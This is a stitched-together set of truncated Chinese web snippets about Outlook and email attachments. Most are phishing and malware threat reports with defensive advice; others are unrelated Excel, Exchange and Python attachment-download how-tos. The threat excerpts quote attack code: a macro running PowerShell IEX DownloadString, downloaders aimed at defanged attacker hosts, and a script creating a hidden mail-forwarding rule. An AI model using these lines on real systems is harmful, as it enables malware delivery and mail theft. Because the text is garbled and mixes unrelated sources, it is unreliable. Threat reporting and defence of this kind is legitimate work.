电子邮件有一行文字:“Get Outlook for Android”,该文字会根据攻击目标的位置进行本地化。例如 .de 电子邮件地址的受害者会收到德语电子邮件。...【钓鱼邮件】 附件通常是一个 .IMG 或者 .ISO 文件,附件中会包含一个 CHM 文件,名为“草稿合同”。...打开该文件后,会弹出如下的窗口: 【CHM 文件】 该文件包含混淆的 JavaScript 代码,会启动如下所示的 PowerShell 命令来下载最终 Payload: 【PowerShell...代码】 最终的 Payload 伪装成 JPG 文件从看起来合法的网站下载,这也是为了规避检测与分析。...AgentTesla 是窃密软件,可以: 从浏览器、电子邮件客户端、VPN 客户端、FTP 客户端、剪贴板中窃取密码 获取用户按键记录 获取屏幕截图 窃取计算机相关信息 下载其他恶意软件 本次攻击行动的攻击者主要进行窃密
三、攻击链技术还原(一)初始投递:高保真诱饵构造邮件正文包含以下要素以增强可信度:引用真实会议编号(如“GSR-2025-09”);插入受害者本人在上次会议中的照片(从官网下载);声称“附件因安全策略转为在线预览...当用户在Windows系统中打开时,自动触发PowerShell脚本下载:下载的PowerShell脚本(payload.ps1)执行以下操作:枚举本地凭证:搜索Chrome/Firefox保存的密码、SSH私钥(~/.ssh/id_rsa)、PuTTY...日历事件;注册隐蔽转发规则:# PowerShell: 创建隐藏邮件转发规则$rule = New-Object -ComObject Outlook.Rule$rule.Name = "Sync Backup...自动下载外部图片/HTMLSet-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Outlook\Options\Mail" -Name
前言 在本地使用Excel时,经常会有需要在Excel中添加一些附件文件的需求,例如在Excel中附带一些Word,CAD图等等。...答案是肯定的,不过和本地不同的是,Web端不会直接打开附件,而是使用超链接单元格的形式来显示,今天小编将为大家介绍使用前端HTML+JS+CSS技术通过超链接单元格的形式实现在线Excel附件上传、下载和修改的操作...使用JS实现附件上传 实现的方式分为四个步骤: 1.创建前端页面 2编写暂存附件信息的方法 3.编写附件文件清除的方法 4.编写文件保存和文件加载的方法 1.创建前端页面 核心代码: 附件会清理掉所有已经上传过的附件信息,打包下载会对所有的附件进行统一下载。...注册的命令主要就是用来做附件文件的下载。
通过安装 Office Online Server 使用户可以在 Exchange Outlook 网页版中查看和编辑受支持的文件附件,而无需先下载这些附件,也无需在本地安装相关程序。...2.安装 Office Online Server 必备组件: 1)下载安装Visual C++ Redistributable for Visual Studio 2015:https://www.microsoft.com...5.打开 Windows PowerShell 并运行以下命令。运行命令时,使用您自己的去替换示例 FQDN 和证书友好名称: Import-Module OfficeWebApps ?...使用您自己的服务器名称和 URL 替换示例服务器名称和 URL: Set-MailboxServer sen-ex01 –WacDiscoveryEndpoint “https://oos.sen.hi.cn...接下来,我们来验证一下,Outlook web APP上是否可以查看和编辑: 在没有OOS时,附件只能下载 ,无法查看和编辑: ? 在启用OOS后: ? ? ?
该组织的托管检测和响应分析师和威胁猎手发现了以 RAR 文件附件为主要攻击手段的网络钓鱼活动。...脚本启动后,会解码 Base64 编码的 PowerShell 命令,这些命令旨在下载看似无害的 JPG 文件“universe-1733359315202-8750.jpg”(SHA256:89959ad7b1ac18bbd1e850f05ab0b5fce164596bce0f1f8aafb70ebd1bbcf900...该图像包含一个嵌入的 .NET DLL 加载器,隐藏在其数据中,使用 PowerShell 的 [Reflection.Assembly]::Load() 方法提取并部署。...CyberProof 的遥测数据显示,该恶意软件还试图从 Outlook 和 FTP 客户端窃取更多信息。被盗凭证通过 FTP 和 SMTP 通道泄露,从而扩大了攻击者的操作灵活性。...分析人员建议查找异常脚本执行、使用 [Reflection.Assembly]::Load() 的 PowerShell 活动以及对 Chrome 或 Edge 凭据数据库的未经授权的访问尝试。
此篇给大家再次送了批量操作一绝活,批量下载OUTLOOK上的邮件附件。除了批量之外,还让大家见识到科学数据管理的精粹。...如简单的从多封邮件中将其附件下载至指定的文件夹内,这样的需求,依靠现有的邮件客户端工具如OUTLOOK、FOXMAIL是无法完成的。...功能入口 注:此功能仅能在微软的OFFICE套件OUTLOOK上使用,在没有安装OUTLOOK的电脑上不能使用。这也间接体现了OFFICE大家庭的优势,各施其职,同时贯通所有。...使用步骤 若OUTLOOK客户端有多个邮件账户时,需要先登录到指定的需要下载附件的所在帐户,再进行插件的操作。...邮件的保存路径,需要一个空的文件夹,若其内有文件,请先删除或新建或另选文件夹 步骤二:点击【遍历邮件下载附件】按钮,即可开始下载附件 从保存的附件文件夹中,可看到附件已顺利下载成功,并且附件做了重命名操作
3.2 载荷投递与执行当用户双击恶意文件后,执行流程如下:宏或脚本释放阶段:若为.docm文件,启用宏后执行VBA代码,从远程服务器下载PowerShell脚本。...二次下载:PowerShell脚本通过HTTPS连接至伪装成云存储(如Google Drive、OneDrive)的C2服务器,获取NetBird客户端二进制文件。...4.1 恶意载荷模拟以下为简化版PowerShell下载器(经脱敏处理):# downloader.ps1$uri = "hxxps://storage[.]attacker[.]com/netbird-agent.exe...5.4 管理层:专项培训与演练每季度开展针对高管的钓鱼模拟演练,使用真实招聘场景作为测试用例;建立“双人确认”机制:任何涉及职位申请或外部文件下载的操作需经助理或IT部门二次确认;提供一键上报按钮,高管可即时标记可疑邮件至...结果:对照组:32%用户点击附件,18%完成完整感染链;实验组:0%用户成功执行恶意载荷;98%钓鱼邮件被邮件层拦截;剩余2%在端点层被EDR阻止;平均响应时间:从邮件接收到威胁阻断<30秒;误报率:<
因此,亟需从攻击链全生命周期出发,构建覆盖邮件入口、端点执行、网络通信与横向移动的闭环防御体系。...;shell.Run(cmd, 0, false);该命令解码后通常为一段下载并执行远程加载器的PowerShell脚本。...进程内存中提取明文凭证;定制化BEC工具:监控Outlook邮件规则,自动转发含“付款”“发票”关键词的邮件。...此阶段标志着攻击从“初始访问”转向“业务影响”,为后续勒索软件部署或商业邮件诈骗(BEC)奠定基础。...从内存直接执行Base64命令(无脚本文件路径);WScript.Shell对象的非常规使用(尤其在非IT用户终端)。
页面跳转后要求下载一个名为“Performance_Review_2025.xlsx”的Excel文件。...,从远程服务器下载第二阶段载荷(如Cobalt Strike Beacon或AgentTesla窃密木马),并注入内存执行,全程不写入磁盘——即所谓的“无文件攻击”(Fileless Malware)。...更常见的是,在PDF中嵌入诱导性文本:“点击此处下载完整评估表”,实则跳转至恶意网站。...3.3 国内启示:我们并非“免疫区”尽管中国企业在绩效管理上多使用钉钉、企业微信等封闭生态,但芦笛警告:“跨境业务、外企分支机构、留学生归国创业团队等群体,仍高度依赖Gmail、Outlook及国际HR...他还推荐使用沙箱环境打开可疑附件。例如,在Windows Sandbox(Win10/11内置)中运行Excel,即使感染也不会影响主机。
%MZ') return 0 #回调函数 def Schedule(a,b,c): ''' a:已经下载的数据块
附件形式包括ZIP压缩包内嵌伪装PDF/DOCX,或指向Google Drive、OneDrive等合法云存储的链接,诱导用户下载含恶意宏或外部模板引用的文档。...同时,攻击者使用目标国家本地语言撰写邮件正文,甚至模仿特定学术机构的行文风格,显著提升可信度。...下载第二阶段载荷,常托管于被黑博客或GitHub Gist,进一步混淆来源。...获取用户名、域名、IP、已安装软件列表;文档枚举:遍历%USERPROFILE%\Documents、Desktop及OneDrive同步目录,筛选.docx、.pdf、.xlsx文件;通讯录提取:通过Outlook...4.4 流程层:安全协作规范推广签名邮件:要求涉及敏感内容的通信必须使用S/MIME或PGP签名;专用协作平台:使用经安全加固的SharePoint或Nextcloud替代邮件附件交换;开展专项演练:模拟
在这里,我们使用PowerShell脚本作为PoC验证。 在我们控制利用的企业用户电子邮箱中,包含可以定期执行我们控制命令的简单PowerShell脚本。...攻击者从互联网登录进入该企业员工被控制利用的Webmail端,并以Powershell方式向其邮箱内自动发送消息邮件的大致方式如下: 该消息邮件被删除之后,进入邮箱垃圾文件夹: 我们植入的恶意程序在内网主机运行之后...: 最终,攻击者只需简单地下载该文件并删除垃圾文件夹内信息,就能以这种“暗度陈仓”的方式实现C&C命令控制和数据窃取(Exfiltration)。...以下为该过程中利用的完整Powershell脚本: 如果目标企业机构使用的是其它架构邮箱系统,如Microsoft (Exchange/Outlook/OWA)等,这其中相关的消息、收件箱...对企业邮箱系统设置双因素认证机制; 监测邮箱内奇怪的附件信息,如PowerShell脚本、加密数据、混淆数据,监测对邮箱的异常访问和操作行为; 企业邮箱系统访问IP限制,如Tor、V**、国家或黑名单等
3 攻击手法与技术分析3.1 社会工程策略通过对23起案例的邮件正文、发件人信息及附件命名分析,发现以下共性:发件人伪装:92%的邮件使用与真实猎头公司高度相似的域名(如michaelpage-careers.net...、roberthalf-global.com),或通过Gmail、Outlook等免费邮箱冒充个人猎头顾问。...下载第二阶段载荷,后者为经过混淆的Cobalt Strike Beacon。...对CFO等高权限账户,进一步限制PowerShell执行策略为“Restricted”。进程行为分析:部署EDR代理,监控Office进程是否启动cmd/powershell,或向非常规域名发起连接。...对比传统SEG方案(仅启用SPF+附件类型过滤),本文方案将针对CFO的钓鱼成功率从68%降至3%。6 结论伪装招聘钓鱼攻击利用CFO的职业特性与权限价值,已成为企业财务安全的重大威胁。
、日历、任务和联系人等 /powershell 用于服务器管理的 Exchange 管理控制台 /RPC 早期的 Outlook 还使用称为 Outlook Anywhere 的 RPC 交互 注意,...因此,在 ews 接口开放的前提下,可以使用该接口检索通讯录,或下载邮件。使用该接口下载邮件时,还可以不触发 已读/未读 标签变更。...下载后需要进行安装,编译好可在Kali下直接使用的版本下载地址: http://x2100.icecube.wisc.edu/downloads/python/python2.6.Linux-x86_...该工具实现了将获取到的 Net-NTLM 哈希重放到真实 Exchange 服务器的 EWS 接口进行认证,通过 EWS 获取用户邮箱的邮件信息、附件下载、创建转发规则、查询GAL等。...shell(因为只能执行 powershell.exe 而无法传递后面的命令行参数); 用户需要在开启 Outlook 的情况下触发规则条件才有效,在未使用 Outlook 的情况下无法触发动作;但是,
这意味着:邮件不会被标记为垃圾;不会触发基于发件人信誉的拦截规则;在Outlook等客户端中显示为“已验证发件人”。攻击者正是看中这一点。...例如:浏览器中已登录的Outlook、SharePoint、OneDrive;Windows凭据管理器中存储的域账号密码;已缓存的Kerberos票据(TGT)。...攻击者甚至会使用数字签名版本(通过盗用或购买开发者证书),进一步规避检测。...以下是一段简化版的PowerShell命令,用于从伪装站点下载并静默执行远程工具:# 伪装为“微软安全更新”$uri = "https://update-microsoft-support[.]xyz/...六、技术破局:从“防邮件”到“控操作”面对回拨型钓鱼,企业需构建三层防御体系:1.
黑客以供应商销售部的名义发出钓鱼邮件,附带了包含CVE-2017-11882漏洞利用的Excel文件,以运行从恶意网站下载的木马程序。...当收件人打开邮件附件文档的时候,会触发漏洞利用下载第一阶段攻击载荷,然后通过多次解密后获得并执行第二阶段第三阶段攻击载荷,第三阶段攻击载荷便是WARZONE RAT,最终连接C&C服务端等待指令。...使用CertUtil.exe下载并启动第一阶段攻击载荷1.exe。...另外,CertUtil能够从远程URL下载证书或任何其他文件。 第一阶段攻击载荷 第一阶段攻击载荷是一个C#编写的程序,代码经过高度混淆。...木马传输的数据使用了RC4加密算法加密,密钥为“warzone160": ? 下载并执行文件功能: ? 设置开启远程桌面: ?
正文提到该议员三天前在议会质询中对《人工智能法案》提出的修正建议,并附上一个名为“AI_Bill_Amendment_Review.pdf”的附件。...几秒后,后台静默运行的恶意宏代码已将他的Outlook会话Cookie上传至境外服务器。攻击者随即登录其企业邮箱,开始翻阅与内阁秘书、外交大臣及智库顾问的往来邮件。...这场无声的渗透战,正将立法机构从“政治舞台”变为“网络前线”。一、从“广撒网”到“精准狙击”:鱼叉式钓鱼的工业化升级传统钓鱼攻击如同撒网捕鱼——发送百万封邮件,期待千分之一的点击率。...PowerShell静默下载并执行Shell "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('" & url...其次,地方人大、政协机关信息化水平参差不齐,部分单位仍在使用弱密码、未启用MFA,甚至通过个人微信处理公务。
自16年至今一直从事数据相关工作,从最初的表哥到现在的大数据、数据挖掘、机器学习,一直不断成长!...(自己淘汰自己的路上越走越远o(╥﹏╥)o),于是想着能不能用代码下载,研究了半天还终于整出来了,而且还是两种方法!...charset: value = value.decode(charset) return value def save_att_file(save_path): """附件下载函数...main(yesterday) 三、无授权码的场景 鉴于企业邮箱没有给开授权码权限,以及业务流程限制不允许使用私人邮箱,又研究了下直接使用win32com直接驱动outlook客户端 注:使用前提...(yesterday): # 创建outlook客户端链接 outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace
但问题出在附件或链接上。表面上是PDF文档或ZIP压缩包,实际上内嵌了恶意脚本。...第二阶段:多层混淆加载下载器从远程服务器获取经过多重混淆的恶意代码,并采用“内存反射加载”技术——即不在硬盘落地,直接在内存中解码并执行,规避传统杀毒软件扫描。...它像一个“全能型间谍”,集成了四大功能:凭据窃取:盗取浏览器保存的密码、Outlook邮箱账号、VPN登录信息;文件打包:扫描本地磁盘,将敏感文档(如合同、设计图、财务报表)压缩打包;横向移动:在内网扫描其他设备...“应严格限制未知来源的脚本执行,尤其是PowerShell连接外网的行为。”芦笛说,“可以通过组策略或EDR工具实现精细管控。”3....凭据最小化 + 短期令牌减少长期有效的静态密码使用,推广短期令牌、单点登录(SSO)和硬件密钥。“即使密码被窃,攻击者也无法长期冒用。”芦笛强调。5.
使用 Python 从 REST URL 下载文件,可以使用 requests 库来简化文件的下载和保存过程。...以下是一个示例代码,展示了如何从给定的 REST API 或 URL 下载文件并保存到本地。1、问题背景我们需要编写一个脚本,从一个支持 REST URL 的网站下载一堆文件。...我们还需要在会话中维护 Cookie 以便下载文件。2、解决方案我们可以使用 requests 库来完成这个任务。...163815075.1.9.1379790485255", "__utmc": "163815075", "__utmz": "1这个简单的 Python 脚本可以帮助我们从...REST URL 下载文件并保存到本地,同时确保了基本的错误处理和内存使用效率。